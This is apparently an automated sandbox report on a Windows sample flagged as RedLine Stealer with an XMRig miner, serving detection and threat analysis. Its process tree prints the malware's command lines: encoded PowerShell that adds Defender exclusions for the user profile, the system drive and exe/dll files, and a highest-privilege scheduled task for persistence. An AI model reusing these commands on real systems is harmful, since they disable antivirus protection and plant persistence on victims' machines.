Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    01-12-2021 12:38

General

  • Target

    0b91486fe1450b8bbc0afac372b2a097.exe

  • Size

    1.5MB

  • MD5

    0b91486fe1450b8bbc0afac372b2a097

  • SHA1

    9de1fc177cd1a9d4429989f263b7744a9e1b2bd8

  • SHA256

    d1a878f7e56555387cd80938e9572d63a906cc06529e98796668cdbdb39578ed

  • SHA512

    075a2bda4aec7f20a72860bc14a992014ab1fa29450af3077a71d60cb8d8de87ffbc21357842199285a882b838189583c15c4951604713530e02c98aad011f6a

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 11 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0b91486fe1450b8bbc0afac372b2a097.exe
    "C:\Users\Admin\AppData\Local\Temp\0b91486fe1450b8bbc0afac372b2a097.exe"
    1⤵
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:520
    • C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:360
      • C:\Windows\system32\cmd.exe
        "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1192
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1480
      • C:\Windows\system32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1664
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"
          4⤵
          • Creates scheduled task(s)
          PID:1168
      • C:\Windows\system32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\Microsoft\services64.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Users\Admin\Microsoft\services64.exe
          C:\Users\Admin\Microsoft\services64.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1764
          • C:\Windows\system32\cmd.exe
            "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
              6⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
              6⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1696
          • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1820
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "cybfewsodjoyl"
              6⤵
                PID:2008
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe oohozetrhivtt0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB3EYEaWtdTNgeO+yOcML2FLdin0Rbrrbm/YoAjK7mqvZEX/HgK//sgsnHcQsRkM9iGKCen+11TiuyHWyZAdf1wMLE4agYXDET+uLyuqzRfvjrbqdOzrMw7uyk9GJnctDF8x49xwghsNTxALZT8Q9OM4wOBYwE039IMn9ca6XIbihoHPQD91cZankNr14oSymuk2oQCdN8unGRix1xx0Uj6LSomcn4YAUKaqkBkcA0ZQXwRJoPDkDWCfmzMO+0hBcRw7vPKagPE3DpyDLBAeW97NBHtDipORq9QC3k80vFHlB
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:324

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Virtualization/Sandbox Evasion

    1
    T1497

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    3
    T1012

    Virtualization/Sandbox Evasion

    1
    T1497

    System Information Discovery

    3
    T1082

    Collection

    Data from Local System

    2
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\1.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • C:\Users\Admin\AppData\Local\Temp\1.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
      MD5

      7b900f7a4d8647d1799856bae7583c46

      SHA1

      c86084fdd33c836b9afea9986f0024f395fc655f

      SHA256

      5af6f0c8abac92bb247d0d2615eccf71eac68745e74e664f0a417d4514dc7ed6

      SHA512

      29d849d2670e3237d4541b22751d6bb4a89caf9df9c167427d049305c884d229b0f9d5ab07cd3f8b1d5496e6c54f47742de2d92ca6dec717013e8055263429b1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      576e54c7a574b6f348de411dd4affe5a

      SHA1

      f271ee73813ea97f6079c302890c95375dcac7be

      SHA256

      013269090c2379cc4535edf82e5ce073b886447bca25cb9893f5a06a6756974b

      SHA512

      1c17d48b13c7fd389f4973d34491eec8a4300e0c5d91bde8c4b9b44fbd8a26c10e8a9296994f08d7bda797278bd4ee502f8abdf50e7e2dab2d72542b0312b92e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      64a4e6ce1dfb469a80e5d90d0633470e

      SHA1

      b08725ca36d10da38ca11b8f1a1dcabf02269024

      SHA256

      7b3861301703b28aeae9f23dfbf1a2b9d78799c5b14f9b7b7276211106a27730

      SHA512

      3244e2c8db4fc2940adf12b682f7c9ad49fdeb40c251e3f6f3eaa175689342403bd4440b0d1174590857c398c4def23cbb0776fda2a6f152539374558fe6b2ad

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      576e54c7a574b6f348de411dd4affe5a

      SHA1

      f271ee73813ea97f6079c302890c95375dcac7be

      SHA256

      013269090c2379cc4535edf82e5ce073b886447bca25cb9893f5a06a6756974b

      SHA512

      1c17d48b13c7fd389f4973d34491eec8a4300e0c5d91bde8c4b9b44fbd8a26c10e8a9296994f08d7bda797278bd4ee502f8abdf50e7e2dab2d72542b0312b92e

    • C:\Users\Admin\Microsoft\services64.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • C:\Users\Admin\Microsoft\services64.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \Users\Admin\AppData\Local\Temp\1.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • \Users\Admin\AppData\Local\Temp\1.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • \Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
      MD5

      7b900f7a4d8647d1799856bae7583c46

      SHA1

      c86084fdd33c836b9afea9986f0024f395fc655f

      SHA256

      5af6f0c8abac92bb247d0d2615eccf71eac68745e74e664f0a417d4514dc7ed6

      SHA512

      29d849d2670e3237d4541b22751d6bb4a89caf9df9c167427d049305c884d229b0f9d5ab07cd3f8b1d5496e6c54f47742de2d92ca6dec717013e8055263429b1

    • \Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
      MD5

      7b900f7a4d8647d1799856bae7583c46

      SHA1

      c86084fdd33c836b9afea9986f0024f395fc655f

      SHA256

      5af6f0c8abac92bb247d0d2615eccf71eac68745e74e664f0a417d4514dc7ed6

      SHA512

      29d849d2670e3237d4541b22751d6bb4a89caf9df9c167427d049305c884d229b0f9d5ab07cd3f8b1d5496e6c54f47742de2d92ca6dec717013e8055263429b1

    • \Users\Admin\Microsoft\services64.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • \Users\Admin\Microsoft\services64.exe
      MD5

      0f429e33854d546047e2064b84cfc529

      SHA1

      81ed33ddd4bf9b795f05aa7d2a7dba2451f6fe31

      SHA256

      feeb82ef56a6d5e0e43beef99f21dd700126c6d0564ce36e2f4c9e7db4e3ea5a

      SHA512

      a1f9fdd0865e4f081c94b42a2d1817d8c3b5eee77b8346ad98c336fc5b119986fc081991993540760aed00f7edb6c88c540ab9dff4920a551041cb59d1b1ea44

    • memory/324-179-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-177-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-184-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-178-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-175-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-180-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-181-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-173-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-185-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-183-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-174-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-176-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-182-0x0000000140000000-0x0000000140787000-memory.dmp
      Filesize

      7.5MB

    • memory/324-187-0x0000000000070000-0x0000000000090000-memory.dmp
      Filesize

      128KB

    • memory/324-186-0x0000000140310068-mapping.dmp
    • memory/360-117-0x000000001C356000-0x000000001C357000-memory.dmp
      Filesize

      4KB

    • memory/360-114-0x000000001C7E0000-0x000000001CBE3000-memory.dmp
      Filesize

      4.0MB

    • memory/360-113-0x000000001C352000-0x000000001C354000-memory.dmp
      Filesize

      8KB

    • memory/360-112-0x0000000000A70000-0x0000000000E77000-memory.dmp
      Filesize

      4.0MB

    • memory/360-116-0x000000001C354000-0x000000001C356000-memory.dmp
      Filesize

      8KB

    • memory/360-120-0x000000001C357000-0x000000001C358000-memory.dmp
      Filesize

      4KB

    • memory/360-110-0x0000000000000000-mapping.dmp
    • memory/520-84-0x0000000002710000-0x0000000002711000-memory.dmp
      Filesize

      4KB

    • memory/520-60-0x00000000027A0000-0x00000000027A1000-memory.dmp
      Filesize

      4KB

    • memory/520-93-0x00000000028A0000-0x00000000028A1000-memory.dmp
      Filesize

      4KB

    • memory/520-92-0x0000000002890000-0x0000000002891000-memory.dmp
      Filesize

      4KB

    • memory/520-96-0x0000000002880000-0x0000000002881000-memory.dmp
      Filesize

      4KB

    • memory/520-97-0x0000000002870000-0x0000000002871000-memory.dmp
      Filesize

      4KB

    • memory/520-98-0x00000000028E0000-0x00000000028E1000-memory.dmp
      Filesize

      4KB

    • memory/520-99-0x0000000000880000-0x0000000000881000-memory.dmp
      Filesize

      4KB

    • memory/520-100-0x0000000000880000-0x0000000000881000-memory.dmp
      Filesize

      4KB

    • memory/520-101-0x00000000028D0000-0x00000000028D1000-memory.dmp
      Filesize

      4KB

    • memory/520-102-0x0000000002320000-0x0000000002321000-memory.dmp
      Filesize

      4KB

    • memory/520-103-0x0000000000880000-0x0000000000881000-memory.dmp
      Filesize

      4KB

    • memory/520-104-0x0000000000880000-0x0000000000881000-memory.dmp
      Filesize

      4KB

    • memory/520-105-0x0000000000400000-0x0000000000402000-memory.dmp
      Filesize

      8KB

    • memory/520-107-0x0000000005B90000-0x0000000005B91000-memory.dmp
      Filesize

      4KB

    • memory/520-95-0x00000000028C0000-0x00000000028C1000-memory.dmp
      Filesize

      4KB

    • memory/520-90-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-91-0x0000000000880000-0x0000000000881000-memory.dmp
      Filesize

      4KB

    • memory/520-89-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-88-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-87-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-86-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-85-0x0000000002780000-0x0000000002781000-memory.dmp
      Filesize

      4KB

    • memory/520-55-0x0000000075D41000-0x0000000075D43000-memory.dmp
      Filesize

      8KB

    • memory/520-77-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-56-0x0000000000400000-0x00000000007FA000-memory.dmp
      Filesize

      4.0MB

    • memory/520-83-0x0000000002720000-0x0000000002721000-memory.dmp
      Filesize

      4KB

    • memory/520-58-0x00000000027E0000-0x00000000027E1000-memory.dmp
      Filesize

      4KB

    • memory/520-57-0x0000000000930000-0x0000000000990000-memory.dmp
      Filesize

      384KB

    • memory/520-78-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-59-0x00000000027F0000-0x00000000027F1000-memory.dmp
      Filesize

      4KB

    • memory/520-61-0x0000000002810000-0x0000000002811000-memory.dmp
      Filesize

      4KB

    • memory/520-62-0x00000000027D0000-0x00000000027D1000-memory.dmp
      Filesize

      4KB

    • memory/520-63-0x00000000027C0000-0x00000000027C1000-memory.dmp
      Filesize

      4KB

    • memory/520-82-0x0000000002760000-0x0000000002761000-memory.dmp
      Filesize

      4KB

    • memory/520-64-0x0000000002830000-0x0000000002831000-memory.dmp
      Filesize

      4KB

    • memory/520-65-0x0000000002800000-0x0000000002801000-memory.dmp
      Filesize

      4KB

    • memory/520-66-0x00000000034D0000-0x00000000034D1000-memory.dmp
      Filesize

      4KB

    • memory/520-67-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-68-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-94-0x0000000002850000-0x0000000002851000-memory.dmp
      Filesize

      4KB

    • memory/520-69-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-79-0x0000000002730000-0x0000000002731000-memory.dmp
      Filesize

      4KB

    • memory/520-81-0x00000000026F0000-0x00000000026F1000-memory.dmp
      Filesize

      4KB

    • memory/520-71-0x00000000022C0000-0x00000000022C1000-memory.dmp
      Filesize

      4KB

    • memory/520-80-0x0000000002740000-0x0000000002741000-memory.dmp
      Filesize

      4KB

    • memory/520-70-0x00000000034C0000-0x00000000034C1000-memory.dmp
      Filesize

      4KB

    • memory/520-74-0x0000000000990000-0x0000000000991000-memory.dmp
      Filesize

      4KB

    • memory/520-72-0x00000000022D0000-0x00000000022D1000-memory.dmp
      Filesize

      4KB

    • memory/520-75-0x00000000022F0000-0x00000000022F1000-memory.dmp
      Filesize

      4KB

    • memory/520-73-0x00000000008D0000-0x00000000008D1000-memory.dmp
      Filesize

      4KB

    • memory/520-76-0x0000000002310000-0x0000000002311000-memory.dmp
      Filesize

      4KB

    • memory/1096-147-0x0000000000000000-mapping.dmp
    • memory/1112-148-0x0000000000000000-mapping.dmp
    • memory/1112-151-0x000007FEEC460000-0x000007FEECFBD000-memory.dmp
      Filesize

      11.4MB

    • memory/1112-153-0x000000001B750000-0x000000001BA4F000-memory.dmp
      Filesize

      3.0MB

    • memory/1168-137-0x0000000000000000-mapping.dmp
    • memory/1192-118-0x0000000000000000-mapping.dmp
    • memory/1464-139-0x0000000000000000-mapping.dmp
    • memory/1480-134-0x00000000023EB000-0x000000000240A000-memory.dmp
      Filesize

      124KB

    • memory/1480-135-0x00000000023E4000-0x00000000023E7000-memory.dmp
      Filesize

      12KB

    • memory/1480-127-0x0000000000000000-mapping.dmp
    • memory/1480-130-0x000007FEECA10000-0x000007FEED56D000-memory.dmp
      Filesize

      11.4MB

    • memory/1480-133-0x00000000023E2000-0x00000000023E4000-memory.dmp
      Filesize

      8KB

    • memory/1480-132-0x00000000023E0000-0x00000000023E2000-memory.dmp
      Filesize

      8KB

    • memory/1588-125-0x0000000002684000-0x0000000002687000-memory.dmp
      Filesize

      12KB

    • memory/1588-122-0x000007FEECA10000-0x000007FEED56D000-memory.dmp
      Filesize

      11.4MB

    • memory/1588-119-0x0000000000000000-mapping.dmp
    • memory/1588-121-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp
      Filesize

      8KB

    • memory/1588-123-0x0000000002680000-0x0000000002682000-memory.dmp
      Filesize

      8KB

    • memory/1588-124-0x0000000002682000-0x0000000002684000-memory.dmp
      Filesize

      8KB

    • memory/1588-131-0x000000000268B000-0x00000000026AA000-memory.dmp
      Filesize

      124KB

    • memory/1588-126-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
      Filesize

      3.0MB

    • memory/1664-136-0x0000000000000000-mapping.dmp
    • memory/1696-166-0x000000001B7F0000-0x000000001BAEF000-memory.dmp
      Filesize

      3.0MB

    • memory/1696-165-0x000007FEEC460000-0x000007FEECFBD000-memory.dmp
      Filesize

      11.4MB

    • memory/1696-161-0x0000000000000000-mapping.dmp
    • memory/1764-154-0x000000001C284000-0x000000001C286000-memory.dmp
      Filesize

      8KB

    • memory/1764-143-0x0000000000000000-mapping.dmp
    • memory/1764-152-0x000000001C282000-0x000000001C284000-memory.dmp
      Filesize

      8KB

    • memory/1820-171-0x0000000000000000-mapping.dmp
    • memory/2008-191-0x0000000001B20000-0x0000000001B23000-memory.dmp
      Filesize

      12KB